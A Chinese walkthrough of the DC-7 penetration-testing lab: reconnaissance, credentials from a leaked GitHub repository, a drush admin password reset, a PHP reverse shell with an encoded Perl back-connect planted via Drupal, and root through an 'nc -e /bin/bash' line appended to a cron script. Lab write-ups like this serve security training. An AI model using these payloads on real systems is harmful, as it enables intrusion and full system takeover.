DC-7

DC系列是专门构建的易受攻击的实验室，旨在获得渗透测试领域的经验，目前总共有9个靶机
关注微信公众号：网络安全101，公众号内回复**DC**，即可获取DC系列靶机镜像！

导入DC7靶机，网络适配器选择NAT模式，确保和kali处于同一IP段！！！

## 信息收集

> 确定IP地址

```
netdiscover -i eth0 -r 192.168.84.0/24
```

![image-20221221141416878](https://oss.maolin101.com/20250107035418617.png-101.webp)

> 扫描端口

![image-20221221141648412](https://oss.maolin101.com/20250107035418618.png-101.webp)

> nmap 漏洞扫描

![image-20221221142103351](https://oss.maolin101.com/20250107035418619.png-101.webp)

## WEB测试

> 基于网站的信息收集

![image-20221221141921572](https://oss.maolin101.com/20250107035418620.png-101.webp)

> 最终在github上面发现代码泄露

https://github.com/Dc7User/staffdb

![image-20221221142257061](https://oss.maolin101.com/20250107035418621.png-101.webp)

> 在config.php文件中发现账户与密码

![image-20221221142520103](https://oss.maolin101.com/20250107035418622.png-101.webp)

>  经测试，可登录ssh

![image-20221221142903970](https://oss.maolin101.com/20250107035418623.png-101.webp)

> 在当前目录下有一个mbox文件

调用了这个脚本

![image-20221221143946586](https://oss.maolin101.com/20250107035418624.png-101.webp)

> 查看当前目录下的文件，backups里面有两个加密文件，不可利用，查看mbox文件，发现是一个计划任务 自动备份数据库的执行情况，调用的脚本是/opt/scripts/backups.sh，是root权限执行的

![image-20221221144211049](https://oss.maolin101.com/20250107035418625.png-101.webp)

注意：drush是专门用来管理Drupal站点的shell，可以用来修改密码

> 故修改站点密码

先进入网站所在的目录

![image-20221221144444315](https://oss.maolin101.com/20250107035418626.png-101.webp)

通过以下命令发现管理员账号admin

```
drush user-information admin
```

![image-20221221144538552](https://oss.maolin101.com/20250107035418627.png-101.webp)

修改admin账户的密码

```
drush upwd admin --password="passwd"
```

![image-20221221144613318](https://oss.maolin101.com/20250107035418628.png-101.webp)

> 以当前的账户密码登录网站后台

![image-20221221144713358](https://oss.maolin101.com/20250107035418629.png-101.webp)

> 写入反弹shell

该位置可以编写文章，但是没有php形式

![image-20221221144929145](https://oss.maolin101.com/20250107035418630.png-101.webp)

安装支持php语言的插件

插件链接：https://ftp.drupal.org/files/projects/php-8.x-1.x-dev.tar.gz

![image-20221221145138623](https://oss.maolin101.com/20250107035418631.png-101.webp)

安装成功![image-20221221145302753](https://oss.maolin101.com/20250107035418632.png-101.webp)

提示：如果报错，则重新安装即可

回到模块中，勾选php安装，安装完成后在内容编辑的地方出现了PHP code

![image-20221221145452096](https://oss.maolin101.com/20250107035418633.png-101.webp)

在该页面写入反弹shell

![image-20221221145753384](https://oss.maolin101.com/20250107035418634.png-101.webp)

```
<?php
function which($pr) {
	$path = execute("which $pr");
	return ($path ? $path : $pr);
	}
function execute($cfe) {
	$res = '';
	if ($cfe) {
		if(function_exists('exec')) {
			@exec($cfe,$res);
			$res = join("\n",$res);
			} 
			elseif(function_exists('shell_exec')) {
			$res = @shell_exec($cfe);
			} elseif(function_exists('system')) {
@ob_start();
@system($cfe);
$res = @ob_get_contents();
@ob_end_clean();
} elseif(function_exists('passthru')) {
@ob_start();
@passthru($cfe);
$res = @ob_get_contents();
@ob_end_clean();
} elseif(@is_resource($f = @popen($cfe,"r"))) {
$res = '';
while(!@feof($f)) {
$res .= @fread($f,1024);
}
@pclose($f);
}
}
return $res;
}
function cf($fname,$text){
if($fp=@fopen($fname,'w')) {
@fputs($fp,@base64_decode($text));
@fclose($fp);
}
}
$yourip = "192.168.84.174";  #监听ip
$yourport = '10086';   #监听端口
$usedb = array('perl'=>'perl','c'=>'c');
$back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj".
"aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR".
"hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT".
"sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI".
"kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi".
"KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl".
"OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==";
cf('/tmp/.bc',$back_connect);
$res = execute(which('perl')." /tmp/.bc $yourip $yourport &");
?> 
```

> 本地开启监听状态

![image-20221221150142003](https://oss.maolin101.com/20250107035418635.png-101.webp)

## 提权

> 获取标准的终端

```
python -c "import pty;pty.spawn('/bin/bash')"
```

![image-20221221150302813](https://oss.maolin101.com/20250107035418636.png-101.webp)

> 利用定时任务提权

追加一个反弹shell到定时任务中，即可

```
echo "nc -e /bin/bash 192.168.84.174 5555" >> /opt/scripts/backups.sh
```

![image-20221221150603684](https://oss.maolin101.com/20250107035418637.png-101.webp)

> 本地监听5555端口，等待backups.sh文件定时执行root权限就好了

![image-20221221150730094](https://oss.maolin101.com/20250107035418638.png-101.webp)

> 获取标准的终端

```
python -c "import pty;pty.spawn('/bin/bash')"
```

![image-20221221151558304](https://oss.maolin101.com/20250107035418639.png-101.webp)

> flag

![image-20221221151650272](https://oss.maolin101.com/20250107035418640.png-101.webp)